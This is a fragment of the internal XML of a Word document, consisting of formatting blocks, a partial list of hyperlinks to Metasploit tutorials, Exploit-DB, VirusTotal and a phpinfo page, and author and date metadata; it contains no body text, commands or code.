      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1578897602">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1582332379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1598174906">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1599870316">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1614896680">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1647002736">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1693411084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1695501749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1738362876">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1801923074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1909992463">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1942256608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1980039376">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1992979736">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2020615396">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107530726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="211185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raw.githubusercontent.com/Homebrew/install/HEAD/install.sh"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IPCIBLE/phpinfo.php"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s://h5ckfun.info/tutoriel-metasploit-pour-debutants-maitrisez-en-5-minutes/"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yperlink" Target="http://virustotal.com" TargetMode="External"/><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hyperlink" Target="https://exploit-db.com"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perso.univ-lyon1.fr/jean-patrick.gelas/UE_Securite/metasplo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293FCF-9767-4729-8331-5F0CC554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4341</Words>
  <Characters>23881</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ecci</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dolunay M.</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2024-06-20T18:04:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-12T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-13T12:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>